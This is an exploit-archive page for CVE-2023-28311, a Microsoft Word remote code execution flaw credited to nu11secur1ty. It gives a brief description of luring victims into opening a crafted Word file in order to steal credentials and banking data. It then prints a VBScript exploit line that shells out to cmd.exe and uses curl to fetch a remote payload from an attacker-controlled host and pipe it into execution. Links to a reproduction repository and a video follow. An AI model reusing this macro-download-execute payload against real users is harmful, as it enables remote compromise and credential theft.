Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- Microsoft Word Remote Code Execution[6]
- Authored by nu11secur1ty[7]
-
Microsoft Word appears to suffer from a remote code execution vulnerability when a user load a malicious file that reaches out to an attacker-controller server to get a hostile payload.
- advisories | CVE-2023-28311[8]
- SHA-256 |
8ab600383b2980700b22b249418126bff6776fde4672ab8d2e1bbd8b3c50a7f2
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
## Title: Microsoft Word Remote Code Execution Vulnerability
## Author: nu11secur1ty
## Date: 04.14.2023
## Vendor: https://www.microsoft.com/
## Software:
https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3
## Reference:
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/
## CVE-2023-28311
## Description:
The attack itself is carried out locally by a user with authentication to
the targeted system. An attacker could exploit the vulnerability by
convincing a victim, through social engineering, to download and open a
specially crafted file from a website which could lead to a local attack on
the victim's computer. The attacker can trick the victim to open a
malicious web page by using a `Word` malicious file and he can steal
credentials, bank accounts information, sniffing and tracking all the
traffic of the victim without stopping - it depends on the scenario and etc.
STATUS: HIGH Vulnerability
[+]Exploit:
The exploit server must be BROADCASTING at the moment when the victim hit
the button of the exploit!
```vbs
Call Shell("cmd.exe /S /c" & "curl -s
http://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)
```
## Reproduce:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)
## Reference:
[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)
[href](
https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)
## Proof and Exploit
[href](https://streamable.com/s60x3k)
## Time spend:
01:00:00
File Tags
- ActiveX[19] (932)
- Advisory[20] (80,729)
- Arbitrary[21] (15,952)
- BBS[22] (2,859)
- Bypass[23] (1,660)
- CGI[24] (1,022)
- Code Execution[25] (7,087)
- Conference[26] (677)
- Cracker[27] (840)
- CSRF[28] (3,310)
- DoS[29] (22,985)
- Encryption[30] (2,359)
- Exploit[31] (50,898)
- File Inclusion[32] (4,190)
- File Upload[33] (951)
- Firewall[34] (821)
- Info Disclosure[35] (2,697)
- Intrusion Detection[36] (879)
- Java[37] (2,963)
- JavaScript[38] (834)
- Kernel[39] (6,488)
- Local[40] (14,327)
- Magazine[41] (586)
- Overflow[42] (12,556)
- Perl[43] (1,419)
- PHP[44] (5,112)
- Proof of Concept[45] (2,298)
- Protocol[46] (3,513)
- Python[47] (1,488)
- Remote[48] (30,375)
- Root[49] (3,541)
- Rootkit[50] (504)
- Ruby[51] (603)
- Scanner[52] (1,633)
- Security Tool[53] (7,833)
- Shell[54] (3,143)
- Shellcode[55] (1,210)
- Sniffer[56] (892)
- Spoof[57] (2,186)
- SQL Injection[58] (16,188)
- TCP[59] (2,389)
- Trojan[60] (687)
- UDP[61] (881)
- Virus[62] (663)
- Vulnerability[63] (31,418)
- Web[64] (9,485)
- Whitepaper[65] (3,740)
- x86[66] (948)
- XSS[67] (17,611)
- Other[68]
File Archives
- April 2023[69]
- March 2023[70]
- February 2023[71]
- January 2023[72]
- December 2022[73]
- November 2022[74]
- October 2022[75]
- September 2022[76]
- August 2022[77]
- July 2022[78]
- June 2022[79]
- May 2022[80]
- Older[81]
Systems
- AIX[82] (426)
- Apple[83] (1,966)
- BSD[84] (372)
- CentOS[85] (56)
- Cisco[86] (1,920)
- Debian[87] (6,723)
- Fedora[88] (1,691)
- FreeBSD[89] (1,244)
- Gentoo[90] (4,288)
- HPUX[91] (878)
- iOS[92] (342)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (67)
- Linux[96] (45,257)
- Mac OS X[97] (684)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (482)
- RedHat[101] (12,990)
- Slackware[102] (941)
- Solaris[103] (1,609)
- SUSE[104] (1,444)
- Ubuntu[105] (8,494)
- UNIX[106] (9,218)
- UnixWare[107] (185)
- Windows[108] (6,539)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]